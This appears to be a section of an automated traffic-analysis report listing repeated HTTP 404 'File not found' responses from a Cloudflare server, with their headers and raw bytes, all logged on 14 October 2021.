                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:35 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uZ0sVZ19FquxOnQnQ8eV27mBYy1WgM0CUPb1NNnWMJzxc3043xzagNkBokq638MVdi87wkRVwA%2FaDhBllVz6Wa7tU%2BXqwhXPidoHFsE7wvUTdAVBYElnVusQQa8dyaLYa2RuJ8MO2LY4BrfzJZWgJLGhDagHvA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf9619e27025-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:36 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cfaTZhkdZ%2B4BJCg2NEEt3iB1wdphtOW7vYogkgF6ssnB0JtOYVEcfiVEntxnGT8GGYD49JE7n6oNLeWj%2BaC3dp6n%2FnvCW6Yfyv6vLBoDeaIyz7FL%2BFkuxcREOUryCFN7LVICmGTi487rSg3JKSZqNWUkm5jFTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf9cfa384a85-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:37 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yx4q2GcB87W4VIt%2F6Bl3361rtQSoUi34qsv3Q1MEZfb%2BSUNJrztSsb%2BJ14kBZzFEMs0Tkh%2F8iKsclQJnJlu7SyIBt6Rz6eoZ8nTufwUUBVTn4sWWS4kQt51roLWM4G0PcAOACqu4oY8Th1%2B801eD8ZrqSMLkmw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfa408094e97-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:38 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Pn8lTUVtVtKkV%2B9%2FhI5pH%2Bbv3JxxkgBA0SYiWdJIlkIQKZcw5zH1I8kAF6QAJOIRQjkM%2BOmDifl0B6xVMTePviWGDxi0zLdm1s%2FnLGulx3kj4q8F2zNoVyQpgtSXW0TCRUbCOKrT9TH7mteyHIsbeqJURSgUUg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfabfe766933-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:39 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fbYEyM1Gh6WdAzvjkUrxUJ61%2BI86%2FMQWYOt736TgF8PYXX4xRDCoMqDGqnuxaI5J8NZQWEAAFQmX57qs%2BjEX9BOBANnKvqJQwuiSDuZUH%2FmkItpnH6MouMDIgY94Ubkv2Xr%2FP6LV0udfFhbt0DzGN4dYvRJYjA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfb2ffc45bdd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:41 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tnOYS6v1%2BDryLySE0XRA3DanDggqIU5lD1efwHzLdufMHOXHG4q7dfhWoqlzoX5wDgi%2BczRB82cB78sgINYZ70528recLHfPp2P6sSiGDKYiKmOnVIaMSw3%2FJ%2FTVZtL%2FZnQlEs8dl3y5rZsfxnVPclRPmHDLkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfbcfff06925-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:42 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0EH47MMNXBWoZhSTeJKDFH5ttH4eNOc7DIMbRM5RUcGlJfPGdlM2qgJ%2FydGTeU89PVVspTxJUD78%2FLsz4jje9NE8J9ra8L440XXrJYNDu3lHjX7Az2%2FQMSbcG0NHixWuQ8qg3I%2FvBmZH39V3W4%2BLjJC5wpkOjw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfc43f923240-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:43 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=krWVnXC%2BdefgGbNlcpBvuV%2B%2FEt1AN8TvqNCkwdnHu1u%2B%2Br4NhUyvinuefOGVyWbc9ShnhxYhW4%2BuqcpJdGFs2cOx%2Bg6Ex6pVLOOMw3MGB8imhhNCOi5JQPVnEFzH54P2wj3uTDGZgD%2B%2BgOSe36UWuNVLFTWpSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfce38355bed-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:45 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CpHKxOLOrpPIM1PF5NEE6vUZ3l5dbYDOl6UNrbCahs5hxC4aJJGhGN7oKjrOL0BSNTAo1uQVbVx5SYG5UeeMMxOeU8B5DsuS3mvrPAdrCRib2ajEVOGtz7to8pV1YDKcBopo%2FKcmdVe3ptFDjf6kWXXiTMwHzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfd76c86440d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:48 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xX8MVuCGjS0FNM%2FvuL2BD8nyHgscINdYF2sTG5gdSsMS3%2F808sSrsFsd18a3PVjF22lX8c6mqEJFN4gRhXrpUEkmDty5RH6trK9n7XiwuMhOgsGG0JxWNKvSSmXgx%2F38h9tCGGDosMS%2FwDye9z6hmxb7OGqF0w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debfe84d3e4309-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:49 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3nVDbQqzeq99VtQdxhWX%2Fj7fXtAJV7srTKCv221y2RZh2a%2F8IS0yw3Zf9GABw%2F42RW46cAvIOehRvvP4M6%2FyJSAId%2Bgjb24pBzUjcG3sOSc%2FJAPaXI%2FrScX7pLEjJO5mSc8ztul8%2Bxk3KF3VKTeg%2Fa5igJ67pw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debff26ef15c2c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:51 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sy0tXiUZGLf%2FShCOiRUnNRckJK1ccZE5lquOjWMUouZuuVvcp%2BfhB5GGR1S0BhIE6pVkDFG%2FzmcmHMOfWnDo6YPcj7m3%2FYYbTB4GxN%2BjA6S6jjPL6chZ1jihY6yWnxqgycQOlIXIPvuqEaE1VHcfl3z2NHMvrA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debffaaf320621-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:52 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z0%2F0G%2FltPrkYLGxzRCt9VdfNUMtip3rLXsYuFpJSTw2Tm%2Bkk99WneQCuJnmMJyMyxB%2FadH9hc7Nck4D5MaWnJHgR8m%2BeuWRD%2BWW1k6AEiWmmZ9D3wy1JfLuw3Xnsjx%2F97L17z30dxppqVVpdcP7o%2BEMd9GCUKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0031f88c2c7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:53 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r0SNwUQXmpNoSyQjbUBF5l8GTY8SywVTmzZ8AkYzJWy0b1O3O5n7b1dHE%2BpDh78zb6iFJ%2BdNIyBnabgJCYCBp9qDa6TZYlhCr6htZEMFmSRyHaUU%2F5WZkBITRFMBZ70zlWfi%2BTeSLQBR3OnT37qPUC6HdB7R1g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec00acb8868e9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:54 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5iKke1AJBJjg1Y4VYs826dmfarUEhJ%2BRldRquW1kfSHN%2F9pyLtsyynuFr6yDn27OBJXeF7xvTdW%2Ft8i1FIp5x0Weuf1lZLtQZXeLjxSzbBGO%2FyFV1amXpr3qEg91BlnrsxMydhByRN7hHp%2FNzcUVzgokqELeaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0119f8505d0-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:56 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ZERCavJqd%2FSKMbfz%2FCdLS9YwGowXmP6tmsSmcJhamaT8Ait4OW44MSZPDPU0Da0xQWD1O7rujLd4vYbmYz9A17IY8%2BGwpvDcLDsDokZqYZuqyxlqEAsXlvosJbc66ZygTYhi55wxB4l2t2Jm5O0fXdSbA4yjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec01a8bea1f31-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:57 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O5KNJiSYA%2FFwVwmEIc9wb3cwwX%2FatGRb1JUO%2Bz%2BO1X6dOTVK5OasGDuojIDlalGExPnvGUgm4%2BBjy6wcTbge3HFAtucsxDcKdwQEvnp1sBeGdfQVSDQonetbCFSY%2BgvOrCkvkI7mREs82y4gLDOZB6jrrwpPJA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0238f384df4-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:59 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DM7UDqfrOC0u1TfBnQ6rtX30q18tMXbF5JIb91n%2BbGCB6ZdVbFXYS95wCnHdXiccXK3L6LtGQvYayuHRvdRXTsx%2Bp%2F8MP1IOTYSnqgQ1RzzD0YUpci6oZfH4e%2BVOk7%2BgeLA12NXL%2BrdcTTN7OA8MSANsnvfhKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec02c0d56695b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:00 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6pzxxxAx7m5C%2BvI0HV9vpq2v%2FMh%2FQtCUhiuQVfVDamOYlWTH%2Fi66M79yyl7xYeat0IDW%2FErpRaBlSviuH6N5w1T51LJh6ilhSkpq5iiAXlGSkcN%2F0RFH%2B4gKfqMyKqrLMrZ%2F9KQlOg0PnfcEYBS9mMuv2oXUEw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec034ea085c38-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:01 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RwxyEXrfJWD7HzQsJLaaJ4ykrDR%2FXfvMae8i0xj3UPR%2Bl89OWY%2FzFHl6zIsjt3MczmsMNyXqydAx4kl6J4imX5JAkkeop22%2Bp9dS34N1vYjp83Fzoam6oRK%2Bx64oqTTVoWsVbFiS6fNE%2F4OFRWqA4k1a9wK%2Feg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec03d7f2c3250-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:03 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=91AmIffLnKe4Pbncz7KrUdCC7%2FIC1zkuoHQN1JfssoGk24gGXGVgK%2FfjSd%2BRFPNjQzfYkOwMtC%2FXqL%2BrxK2TSNEenBHg5Mzc%2Fbxkf4%2Fw%2FzewmKsOYKbBYCwux31XnGOv3FNqWKnELOMAweMsH1mdlUR0lqprnw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0464cd51772-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:06 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vcIT0xtrtdVqZu8AstBfvjAOVLZeU0jJkIg51LaEYzt2WcaP0aINNFdyPyzHGCi%2BFUn%2Bt9DitNetNAaC7a2WU1CkIz4esUAOdjvWe6RoWWH3jxFIhJPzOheLtuS4TLQLSt5M8LPLyDNCbhVFlEiI3yXDVeNVew%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec059aa9618e5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:07 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AsF%2F42rJeMS4o1jyaWpX5rcN1C7%2BwlYe9QyAvadZhUprUUDjjvl2mBaUHv2qSzvsM16RfVyDjciOwaQ0dYaMDLZXn9BBMNQ78ci9geDbIWxYBOq%2Ff7WlFnJZqgqdZEFqzws6tXcgPBAa0hiRMJyXMKzh%2BY5Kzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0621a7342f1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:08 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AETlKv0JLdUaJlMFIYw4c%2FUS3KY3jsZfqgBBcqkQPH7kBiRqISjQcPL9%2F6EycOt8Q0b%2BrCiBpVWf2JTuaTeRvPun%2BVdjS3dtjl0255v8MUhEF3A8ouzlFjwM9m5wMuIPxpMuRcbOokOsnygMEGf%2FVwZGMBD6qw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0698d3268e5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:10 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=erKQyQL4NJDpVARn6gPTghRshW34aWgx999kFto0hxMgvDWKpjzkg8Ub9PghJyk1Z5TjvoNbgssstoLWvM30lY7gyqwlTQwOwpeLID12mO81PbUOzRbpTH9BULjM1lW%2FOKhQiir%2FSFqgaO1xg4olF%2FOm%2FEl05Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec070fbf74e98-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:11 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FYS21KNhhPKeyLYemwqTO7CJfgOLB%2BcE8nmbaXZezuXpmbCfYbooJZGrTK1I2wCAIGGXi7Mmgbbcm9cTp0SlhyncjZPkn5v4lky0Kk4tKiYowD6Fp1RjLa2jaLWKfS7dODQ0ElVEAkA4Fmys4RO0oXOblnwXng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0788baf7049-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:12 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B2qI3uPr1SHaFu9HAlyv12q%2Fhc2IMayWd%2Bj1fcV0AkZcaVue84gdm%2F7cQrR6vLY0VY7KYJBbWGLpWPtzrfM9eaBQPFNmCRI7TpAHhLrs47U15LbrrJR0WJX9Oc%2Bk59NVPnfHDIGNV6BI%2BfF99GVheeaXjWvcKA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0803a323128-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
